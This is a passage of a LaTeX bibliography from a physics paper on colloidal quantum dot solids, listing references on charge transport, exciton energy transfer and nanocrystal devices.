Adinolfi, Voznyy, and Sargent]{Near_infrared_LED_2016}
Gong,~X.; Yang,~Z.; Walters,~G.; Comin,~R.; Ning,~Z.; Beauregard,~E.;
Adinolfi,~V.; Voznyy,~O.; Sargent,~E.~H. Highly Efficient Quantum Dot
Near-Infrared Light-Emitting Diodes. \emph{Nat. Photonics} \textbf{2016},
\emph{10}, 253--257\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Bae \latin{et~al.}(2013)Bae, Park, Lim, Lee, Padilha, McDaniel, Robel,
Lee, Pietryga, and Klimov]{Robel_Lee_Pietryga_Klimov_2013}
Bae,~W.~K.; Park,~Y.-S.; Lim,~J.; Lee,~D.; Padilha,~L.~A.; McDaniel,~H.;
Robel,~I.; Lee,~C.; Pietryga,~J.~M.; Klimov,~V.~I. Controlling the Influence
of Auger Recombination on the Performance of Quantum-Dot Light-Emitting
Diodes. \emph{Nat. Commun.} \textbf{2013}, \emph{4}, 2661\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Straus \latin{et~al.}(2015)Straus, Goodwin, Gaulding, Muramoto,
Murray, and Kagan]{Kagan_surface_trap_passivation}
Straus,~D.~B.; Goodwin,~E.~D.; Gaulding,~E.~A.; Muramoto,~S.; Murray,~C.~B.;
Kagan,~C.~R. Increased Carrier Mobility and Lifetime in {CdSe} Quantum Dot
Thin Films through Surface Trap Passivation and Doping. \emph{J. Phys. Chem. Lett.}
\textbf{2015}, \emph{6}, 4605--4609\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Choi \latin{et~al.}(2012)Choi, Fafarman, Oh, Ko, Kim, Diroll,
Muramoto, Gillen, Murray, and Kagan]{Murray_Bandlike}
Choi,~J.-H.; Fafarman,~A.~T.; Oh,~S.~J.; Ko,~D.-K.; Kim,~D.~K.; Diroll,~B.~T.;
Muramoto,~S.; Gillen,~J.~G.; Murray,~C.~B.; Kagan,~C.~R. Bandlike Transport
in Strongly Coupled and Doped Quantum Dot Solids: A Route to High-Performance
Thin-Film Electronics. \emph{Nano Lett.} \textbf{2012}, \emph{12},
2631--2638\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Reich \latin{et~al.}(2014)Reich, Chen, and
Shklovskii]{Reich_Shklovskii}
Reich,~K.~V.; Chen,~T.; Shklovskii,~B.~I. Theory of a Field-Effect Transistor
Based on a Semiconductor Nanocrystal Array. \emph{Phys. Rev. B}
\textbf{2014}, \emph{89}, 235303\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Liu \latin{et~al.}(2013)Liu, Tolentino, Gibbs, Ihly, Perkins, Liu,
Crawford, Hemminger, and Law]{iu_Crawford_Hemminger_Law_2013}
Liu,~Y.; Tolentino,~J.; Gibbs,~M.; Ihly,~R.; Perkins,~C.~L.; Liu,~Y.;
Crawford,~N.; Hemminger,~J.~C.; Law,~M. {PbSe} Quantum Dot Field-Effect
Transistors with Air-Stable Electron Mobilities above
$7~\mathrm{cm^2V^{-1}s^{-1}}$. \emph{Nano Lett.} \textbf{2013}, \emph{13},
1578--1567\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Choi \latin{et~al.}(2016)Choi, Wang, Oh, Paik, Sung, Sung, Ye, Zhao,
Diroll, Murray, and Kagan]{Kagan_FET_2016}
Choi,~J.-H.; Wang,~H.; Oh,~S.~J.; Paik,~T.; Sung,~P.; Sung,~J.; Ye,~X.;
Zhao,~T.; Diroll,~B.~T.; Murray,~C.~B.; Kagan,~C.~R. Exploiting the
Colloidal Nanocrystal Library to Construct Electronic Devices. \emph{Science}
\textbf{2016}, \emph{352}, 205--208\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Keuleyan \latin{et~al.}(2011)Keuleyan, Lhuillier, Brajuskovic, and
Guyot-Sionnest]{Philippe_HgTe}
Keuleyan,~S.; Lhuillier,~E.; Brajuskovic,~V.; Guyot-Sionnest,~P. Mid-Infrared
{HgTe} Colloidal Quantum Dot Photodetectors. \emph{Nat. Photonics}
\textbf{2011}, \emph{5}, 489--493\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Jeong and Guyot-Sionnest(2016)Jeong, and
Guyot-Sionnest]{Philippe_mid_infrared_2016}
Jeong,~K.~S.; Guyot-Sionnest,~P. Mid-Infrared Photoluminescence of CdS and
{CdSe} Colloidal Quantum Dots. \emph{ACS Nano} \textbf{2016}, \emph{10},
2225--2231\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Talapin \latin{et~al.}(2010)Talapin, Lee, Kovalenko, and
Shevchenko]{Lee_Kovalenko_Shevchenko_2010}
Talapin,~D.~V.; Lee,~J.-S.; Kovalenko,~M.~V.; Shevchenko,~E.~V. Prospects of
Colloidal Nanocrystals for Electronic and Optoelectronic Applications.
\emph{Chem. Rev. (Washington, DC, U. S.)} \textbf{2010}, \emph{110}, 389--458\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kagan and Murray(2015)Kagan, and Murray]{Kagan_QD_review}
Kagan,~C.~R.; Murray,~C.~B. Charge Transport in Strongly Coupled Quantum Dot
Solids. \emph{Nat. Nanotechnol.} \textbf{2015}, \emph{10}, 1013–1026\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Liu \latin{et~al.}(2013)Liu, Lee, and
Talapin]{Talapin_2013_high_mobility}
Liu,~W.; Lee,~J.-S.; Talapin,~D.~V. {III-V} Nanocrystals Capped with Molecular
Metal Chalcogenide Ligands: High Electron Mobility and Ambipolar
Photoresponse. \emph{J. Am. Chem. Soc.} \textbf{2013},
\emph{135}, 1349--1357\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Lanigan and Thimsen(2016)Lanigan, and Thimsen]{Thimsen_ZnO_MIT}
Lanigan,~D.; Thimsen,~E. Contact Radius and the Insulator–Metal Transition in
Films Comprised of Touching Semiconductor Nanocrystals. \emph{ACS Nano}
\textbf{2016}, \emph{10}, 6744–6752\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Oh \latin{et~al.}(2014)Oh, Berry, Choi, Gaulding, Lin, Paik, Diroll,
Muramoto, Murray, and Kagan]{Kagan_ALD_NC_2014}
Oh,~S.~J.; Berry,~N.~E.; Choi,~J.-H.; Gaulding,~E.~A.; Lin,~H.; Paik,~T.;
Diroll,~B.~T.; Muramoto,~S.; Murray,~C.~B.; Kagan,~C.~R. Designing
High-Performance {PbS} and {PbSe} Nanocrystal Electronic Devices through
Stepwise, Post-Synthesis, Colloidal Atomic Layer Deposition. \emph{Nano
Letters} \textbf{2014}, \emph{14}, 1559--1566\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Delerue(2016)]{Review_NC__touching_array}
Delerue,~C. Nanocrystal Solids: Order and Progress. \emph{Nat. Mater.}
\textbf{2016}, \emph{15}, 498--499\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Williams \latin{et~al.}(2009)Williams, Tisdale, Leschkies, Haugstad,
Norris, Aydil, and Zhu]{strong_coupling_superlattice}
Williams,~K.~J.; Tisdale,~W.~A.; Leschkies,~K.~S.; Haugstad,~G.; Norris,~D.~J.;
Aydil,~E.~S.; Zhu,~X.-Y. Strong Electronic Coupling in Two-Dimensional
Assemblies of Colloidal {PbSe} Quantum Dots. \emph{ACS Nano} \textbf{2009},
\emph{3}, 1532--1538\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Walravens \latin{et~al.}(2016)Walravens, Roo, Drijvers, ten Brinck,
Solano, Dendooven, Detavernier, Infante, and Hens]{QD_epitaxial_conneccted}
Walravens,~W.; Roo,~J.~D.; Drijvers,~E.; ten Brinck,~S.; Solano,~E.;
Dendooven,~J.; Detavernier,~C.; Infante,~I.; Hens,~Z. Chemically Triggered
Formation of Two-Dimensional Epitaxial Quantum Dot Superlattices. \emph{ACS
Nano} \textbf{2016}, \emph{10}, 6861–6870\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Baumgardner \latin{et~al.}(2013)Baumgardner, Whitham, and
Hanrath]{lattice_NC_Tobias}
Baumgardner,~W.~J.; Whitham,~K.; Hanrath,~T. Confined-but-Connected Quantum
Solids \emph{via} Controlled Ligand Displacement. \emph{Nano Lett.} \textbf{2013},
\emph{13}, 3225--3231\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Sandeep \latin{et~al.}(2014)Sandeep, Azpiroz, Evers, Boehme, Moreels,
Kinge, Siebbeles, Infante, and Houtepen]{facet_PbSE_mobility_2}
Sandeep,~C. S.~S.; Azpiroz,~J.~M.; Evers,~W.~H.; Boehme,~S.~C.; Moreels,~I.;
Kinge,~S.; Siebbeles,~L. D.~A.; Infante,~I.; Houtepen,~A.~J. Epitaxially
Connected {PbSe} Quantum-Dot Films: Controlled Neck Formation and
Optoelectronic Properties. \emph{ACS Nano} \textbf{2014}, \emph{8},
11499--11511\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Li \latin{et~al.}(2016)Li, Zhitomirsky, Dave, and
Grossman]{facet_PbSE_mobility_1}
Li,~H.; Zhitomirsky,~D.; Dave,~S.; Grossman,~J.~C. Toward the Ultimate Limit of
Connectivity in Quantum Dots with High Mobility and Clean Gaps. \emph{ACS
Nano} \textbf{2016}, \emph{10}, 606--614\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Whitham \latin{et~al.}(2016)Whitham, Yang, Savitzky, Kourkoutis, Wise,
and Hanrath]{transport_lattice_QD}
Whitham,~K.; Yang,~J.; Savitzky,~B.~H.; Kourkoutis,~L.~F.; Wise,~F.;
Hanrath,~T. Charge Transport And Localization In Atomically Coherent Quantum
Dot Solids. \emph{Nat. Mater.} \textbf{2016}, \emph{15}, 557--563\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Evers \latin{et~al.}(2015)Evers, Schins, Aerts, Kulkarni, Capiod,
Berthe, Grandidier, Delerue, van~der Zant, van Overbeek, Peters,
Vanmaekelbergh, and Siebbeles]{lattice_NC_Vanmaekelbergh_THzmobility}
Evers,~W.~H.; Schins,~J.~M.; Aerts,~M.; Kulkarni,~A.; Capiod,~P.; Berthe,~M.;
Grandidier,~B.; Delerue,~C.; van~der Zant,~H. S.~J.; van Overbeek,~C.; Peters,~J.~L.
;Vanmaekelbergh,~D.; Siebbeles~L.~D.~A.
High Charge Mobility in Two-Dimensional Percolative Networks
of {PbSe} Quantum Dots Connected by Atomic Bonds. \emph{Nat. Commun.}
\textbf{2015}, \emph{6}, 8195\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Jang \latin{et~al.}(2015)Jang, Dolzhnikov, Liu, Nam, Shim, and
Talapin]{Talapin_NCs_bridges}
Jang,~J.; Dolzhnikov,~D.~S.; Liu,~W.; Nam,~S.; Shim,~M.; Talapin,~D.~V.
Solution-Processed Transistors Using Colloidal Nanocrystals with
Composition-Matched Molecular {\textquotedblleft}Solders{\textquotedblright}:
Approaching Single Crystal Mobility. \emph{Nano Lett.} \textbf{2015},
\emph{15}, 6309--6317\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Fu \latin{et~al.}(2016)Fu, Reich, and
Shklovskii]{localization_length_NC}
Fu,~H.; Reich,~K.~V.; Shklovskii,~B.~I. Hopping Conductivity and
Insulator-Metal Transition in Films of Touching Semiconductor Nanocrystals.
\emph{Phys. Rev. B} \textbf{2016}, \emph{93}, 125430\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Chen \latin{et~al.}(2016)Chen, Reich, Kramer, Fu, Kortshagen, and
Shklovskii]{Ting_MIT}
Chen,~T.; Reich,~K.~V.; Kramer,~N.~J.; Fu,~H.; Kortshagen,~U.~R.;
Shklovskii,~B.~I. Metal-Insulator Transition in Films of Doped Semiconductor
Nanocrystals. \emph{Nat. Mater.} \textbf{2016}, \relax
\mciteBstWouldAddEndPunctfalse
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kagan \latin{et~al.}(1996)Kagan, Murray, and
Bawendi]{Kagan_Foster_CdSe}
Kagan,~C.~R.; Murray,~C.~B.; Bawendi,~M.~G. Long-Range Resonance Transfer of
Electronic Excitations in Close-Packed {CdSe} Quantum-Dot Solids. \emph{Phys.
Rev. B} \textbf{1996}, \emph{54}, 8633--8643\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Crooker \latin{et~al.}(2002)Crooker, Hollingsworth, Tretiak, and
Klimov]{Klimov_exciton_transfer}
Crooker,~S.~A.; Hollingsworth,~J.~A.; Tretiak,~S.; Klimov,~V.~I. Spectrally
Resolved Dynamics of Energy Transfer in Quantum-Dot Assemblies: Towards
Engineered Energy Flows in Artificial Materials. \emph{Phys. Rev. Lett.}
\textbf{2002}, \emph{89}, 186802\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Miyazaki and Kinoshita(2012)Miyazaki, and
Kinoshita]{Kinoshita_exciton_hopping}
Miyazaki,~J.; Kinoshita,~S. Site-Selective Spectroscopic Study on the Dynamics
of Exciton Hopping in an Array of Inhomogeneously Broadened Quantum Dots.
\emph{Phys. Rev. B} \textbf{2012}, \emph{86}, 035303\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Achermann \latin{et~al.}(2003)Achermann, Petruska, Crooker, and
Klimov]{Klimov_Foster}
Achermann,~M.; Petruska,~M.~A.; Crooker,~S.~A.; Klimov,~V.~I. Picosecond Energy
Transfer in Quantum Dot Langmuir−Blodgett Nanoassemblies. \emph{J. Phys. Chem. B}
\textbf{2003}, \emph{107}, 13782--13787\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kholmicheva \latin{et~al.}(2015)Kholmicheva, Moroz, Bastola,
Razgoniaeva, Bocanegra, Shaughnessy, Porach, Khon, and
Zamkov]{Zamkov_exciton_diffusion}
Kholmicheva,~N.; Moroz,~P.; Bastola,~E.; Razgoniaeva,~N.; Bocanegra,~J.;
Shaughnessy,~M.; Porach,~Z.; Khon,~D.; Zamkov,~M. Mapping the Exciton
Diffusion in Semiconductor Nanocrystal Solids. \emph{ACS Nano} \textbf{2015},
\emph{9}, 2926--2937\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Poulikakos \latin{et~al.}(2014)Poulikakos, Prins, and
Tisdale]{Tisdale_exciton_migration}
Poulikakos,~L.~V.; Prins,~F.; Tisdale,~W.~A. Transition from Thermodynamic to
Kinetic-Limited Excitonic Energy Migration in Colloidal Quantum Dot Solids.
\emph{J. Phys. Chem. C} \textbf{2014}, \emph{118},
7894--7900\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Crisp \latin{et~al.}(2013)Crisp, Schrauben, Beard, Luther, and
Johnson]{uben_Beard_Luther_Johnson_2013}
Crisp,~R.~W.; Schrauben,~J.~N.; Beard,~M.~C.; Luther,~J.~M.; Johnson,~J.~C.
Coherent Exciton Delocalization in Strongly Coupled Quantum Dot Arrays.
\emph{Nano Lett.} \textbf{2013}, \emph{13}, 4862--4869\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Mork \latin{et~al.}(2014)Mork, Weidman, Prins, and
Tisdale]{Tisdale_Foster_radius}
Mork,~A.~J.; Weidman,~M.~C.; Prins,~F.; Tisdale,~W.~A. Magnitude of the
{F}{\"o}rster Radius in Colloidal Quantum Dot Solids. \emph{J. Phys. Chem. C}
\textbf{2014}, \emph{118}, 13920--13928\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Akselrod \latin{et~al.}(2014)Akselrod, Prins, Poulikakos, Lee,
Weidman, Mork, Willard, Bulovic, and Tisdale]{Tisdale_subdiffusive_transport}
Akselrod,~G.~M.; Prins,~F.; Poulikakos,~L.~V.; Lee,~E. M.~Y.; Weidman,~M.~C.;
Mork,~A.~J.; Willard,~A.~P.; Bulovic,~V.; Tisdale,~W.~A. Subdiffusive Exciton
Transport in Quantum Dot Solids. \emph{Nano Lett.} \textbf{2014},
\emph{14}, 3556--3562\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Murray \latin{et~al.}(2000)Murray, Kagan, and
Bawendi]{Murray-AnnuRev30-2000}
Murray,~C.~B.; Kagan,~C.~R.; Bawendi,~M.~G. Synthesis And Characterization Of
Monodisperse Nanocrystals And Close-Packed Nanocrystal Assemblies.
\emph{Annu. Rev. Mater. Sci.} \textbf{2000}, \emph{30},
545--610\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kalesaki \latin{et~al.}(2014)Kalesaki, Delerue, Morais~Smith,
Beugeling, Allan, and Vanmaekelbergh]{Delerue_band}
Kalesaki,~E.; Delerue,~C.; Morais~Smith,~C.; Beugeling,~W.; Allan,~G.;
Vanmaekelbergh,~D. Dirac Cones, Topological Edge States, and Nontrivial Flat
Bands in Two-Dimensional Semiconductors with a Honeycomb Nanogeometry.
\emph{Phys. Rev. X} \textbf{2014}, \emph{4}, 011010\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kalesaki \latin{et~al.}(2013)Kalesaki, Evers, Allan, Vanmaekelbergh,
and Delerue]{Delerue_2D_band}
Kalesaki,~E.; Evers,~W.~H.; Allan,~G.; Vanmaekelbergh,~D.; Delerue,~C.
Electronic Structure of Atomically Coherent Square Semiconductor
Superlattices with Dimensionality Below Two. \emph{Phys. Rev. B}
\textbf{2013}, \emph{88}, 115431\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Beugeling \latin{et~al.}(2015)Beugeling, Kalesaki, Delerue, Niquet,
Vanmaekelbergh, and Smith]{Delerue_topology_2D}
Beugeling,~W.; Kalesaki,~E.; Delerue,~C.; Niquet,~Y.-M.; Vanmaekelbergh,~D.;
Smith,~C.~M. Topological States in Multi-Orbital {HgTe} Honeycomb Lattices.
\emph{Nat. Commun.} \textbf{2015}, \emph{6}, 6316\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Madelung(2013)]{978-3-642-62332-5}
Madelung,~O. \emph{Semiconductors: Data Handbook}; Springer:New-York, 2004 \relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Reich and Shklovskii(2016)Reich, and
Shklovskii]{dielectric_constant_touching_NC}
Reich,~K.~V.; Shklovskii,~B.~I. Dielectric Constant and Charging Energy in
Array of Touching Nanocrystals. \emph{Appl. Phys. Lett.} \textbf{2016},
\emph{108}, 113104\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Nirmal \latin{et~al.}(1995)Nirmal, Norris, Kuno, Bawendi, Efros, and
Rosen]{Efros_dark_exciton}
Nirmal,~M.; Norris,~D.~J.; Kuno,~M.; Bawendi,~M.~G.; Efros,~A.~L.; Rosen,~M.
Observation of the "Dark Exciton" in {CdSe} Quantum Dots. \emph{Phys. Rev.
Lett.} \textbf{1995}, \emph{75}, 3728--3731\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Dexter(1953)]{Dexter_transfer}
Dexter,~D.~L. A Theory of Sensitized Luminescence in Solids. \emph{J. Chem. Phys.}
\textbf{1953}, \emph{21}, 836--850\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Liu \latin{et~al.}(2015)Liu, Rodina, Yakovlev, Golovatenko, Greilich,
Vakhtin, Susha, Rogach, Kusrayev, and Bayer]{energy_transport_NC_Rodina}
Liu,~F.; Rodina,~A.~V.; Yakovlev,~D.~R.; Golovatenko,~A.~A.; Greilich,~A.;
Vakhtin,~E.~D.; Susha,~A.; Rogach,~A.~L.; Kusrayev,~Y.~G.; Bayer,~M.
F\"orster Energy Transfer of Dark Excitons Enhanced by a Magnetic Field in an
Ensemble of {CdTe} Colloidal Nanocrystals. \emph{Phys. Rev. B} \textbf{2015},
\emph{92}, 125403\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Blumling \latin{et~al.}(2012)Blumling, Tokumoto, McGill, and
Knappenberger]{Exciton_CdSe_H_T}
Blumling,~D.~E.; Tokumoto,~T.; McGill,~S.; Knappenberger,~K.~L. Temperature-
and Field-Dependent Energy Transfer in {CdSe} Nanocrystal Aggregates Studied
by Magneto-Photoluminescence Spectroscopy. \emph{Phys. Chem. Chem. Phys.}
\textbf{2012}, \emph{14}, 11053\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Landau and Lifshits(1977)Landau, and Lifshits]{landau_quantum}
Landau,~L.; Lifshits,~E. \emph{Quantum Mechanics: Non-relativistic Theory};
Butterworth Heinemann: New-York, 1977\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Moskalenko and Yassievich(2004)Moskalenko, and
Yassievich]{Yassievich_excitons_Si}
Moskalenko,~A.~S.; Yassievich,~I.~N. Excitons in {Si} Nanocrystals.
\emph{Phys. Solid State} \textbf{2004}, \emph{46}, 1508--1519\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Burdov(2002)]{Holes_electrons_NCs}
Burdov,~V.~A. Electron and Hole Spectra of Silicon Quantum Dots. \emph{J. Exp. Theor. Phys.}
\textbf{2002}, \emph{94},
411--418\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Allan and Delerue(2007)Allan, and Delerue]{Delerue_Foster_NC}
Allan,~G.; Delerue,~C. Energy Transfer Between Semiconductor Nanocrystals:
Validity of {F}{\"o}rster's Theory. \emph{Phys. Rev. B} \textbf{2007},
\emph{75}\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Poddubny and Rodina(2016)Poddubny, and Rodina]{Forster_Rodina}
Poddubny,~A.~N.; Rodina,~A.~V. Nonradiative and Radiative {F}{\"o}rster Energy
Transfer Between Quantum Dots. \emph{J. Exp. Theor. Phys.} \textbf{2016}, \emph{122}, 531--538\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Blood(2015)]{laser_devices_Blood}
Blood,~P. \emph{Quantum Confined Laser Devices: Optical gain and recombination
in semiconductors}; Oxford University Press: Oxford, 2015\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Efros and Rosen(2000)Efros, and Rosen]{Efros_review_NCs}
Efros,~A.~L.; Rosen,~M. The Electronic Structure of Semiconductor Nanocrystals.
\emph{Annu. Rev. Mater. Sci.} \textbf{2000}, \emph{30},
475--521\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Anderson(1963)]{Anderson_potential_kinetic_exchange}
Anderson,~P.~W. In \emph{Solid State Physics}; Seitz,~F., Turnbull,~D., Eds.;
Academic Press: New-York, 1963; Vol.~14; pp 99 -- 214\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kang and Wise(1997)Kang, and Wise]{Wise_PbSe}
Kang,~I.; Wise,~F.~W. Electronic Structure and Optical Properties of {PbS} and
{PbSe} Quantum Dots. \emph{J. Opt. Soc. Am. B} \textbf{1997}, \emph{14},
1632--1646\relax
